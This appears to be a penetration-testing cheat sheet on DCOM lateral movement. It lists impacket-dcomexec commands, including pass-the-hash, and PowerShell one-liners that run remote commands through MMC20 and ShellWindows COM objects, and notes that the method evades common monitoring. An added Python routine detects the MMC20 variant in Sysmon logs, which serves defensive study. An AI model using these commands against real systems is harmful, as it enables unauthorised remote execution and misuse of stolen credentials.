Overview

DCOM (Distributed Component Object Model) allows remote interaction with COM objects. Several COM objects support command execution. DCOM uses port 135 plus dynamic high ports.

Impacket — dcomexec

impacket-dcomexec DOMAIN/user:password@TARGET
impacket-dcomexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-dcomexec DOMAIN/user:password@TARGET "whoami"

Specify Object

impacket-dcomexec -object MMC20 DOMAIN/user:password@TARGET
impacket-dcomexec -object ShellWindows DOMAIN/user:password@TARGET
impacket-dcomexec -object ShellBrowserWindow DOMAIN/user:password@TARGET

PowerShell — MMC20.Application

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd", $null, "/c whoami > C:\temp\out.txt", "7")

PowerShell — ShellWindows

$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "TARGET"))
$com.item().Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\temp\out.txt", "C:\Windows\System32", $null, 0)

Advantages

  • Less monitored than SMB-based tools
  • No service creation
  • No binary upload
  • Different network signature than PsExec/WMI

Requirements

  • Admin rights on target
  • RPC (135) + dynamic high ports accessible
  • DCOM enabled on target
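
Because the MMC20 method creates no service and uploads no binary, detection has to rely on process ancestry. The following is an added example, not part of the original page: it flags children of an mmc.exe that was started by COM activation (its command line carries -Embedding) and lists inbound port 135 connections seen on the same host shortly before. Field names follow Sysmon Event IDs 1 and 3; the records, hostnames, addresses and the 30-second window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed Sysmon-style records (Event ID 1 = process create, 3 = network connection).
# Hostnames, addresses and times are made up for this example.
EVENTS = [
    {"EventID": 3, "UtcTime": "2024-05-01 10:00:01", "Computer": "WS01",
     "SourceIp": "10.0.0.50", "DestinationPort": 135, "Initiated": False},
    {"EventID": 1, "UtcTime": "2024-05-01 10:00:03", "Computer": "WS01",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c whoami > C:\temp\out.txt",
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     "ParentCommandLine": r"C:\Windows\system32\mmc.exe -Embedding"},
    # Benign contrast: mmc.exe opened interactively with a snap-in file.
    {"EventID": 1, "UtcTime": "2024-05-01 11:30:00", "Computer": "WS02",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     "ParentCommandLine": r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\compmgmt.msc"'},
]

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")

def find_mmc20_dcom_exec(events, window=timedelta(seconds=30)):
    """Return alerts for children of a COM-activated mmc.exe, with candidate source IPs."""
    rpc_in = [e for e in events if e["EventID"] == 3
              and e["DestinationPort"] == 135 and not e["Initiated"]]
    alerts = []
    for e in events:
        if e["EventID"] != 1:
            continue
        # Parent must be mmc.exe launched via COM activation, not by a user.
        if not e["ParentImage"].lower().endswith("\\mmc.exe"):
            continue
        if "-embedding" not in e["ParentCommandLine"].lower():
            continue
        t = _ts(e)
        sources = sorted({c["SourceIp"] for c in rpc_in
                          if c["Computer"] == e["Computer"]
                          and timedelta(0) <= t - _ts(c) <= window})
        alerts.append({"host": e["Computer"], "time": e["UtcTime"],
                       "command": e["CommandLine"], "sources": sources})
    return alerts

if __name__ == "__main__":
    for alert in find_mmc20_dcom_exec(EVENTS):
        print(alert)
```

This covers only the MMC20 object; it does not address ShellWindows or ShellBrowserWindow.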

Quick Reference

Task          Command
Shell         impacket-dcomexec DOMAIN/user:pass@TARGET
PtH           impacket-dcomexec DOMAIN/user@TARGET -hashes :HASH
MMC20         -object MMC20
ShellWindows  -object ShellWindows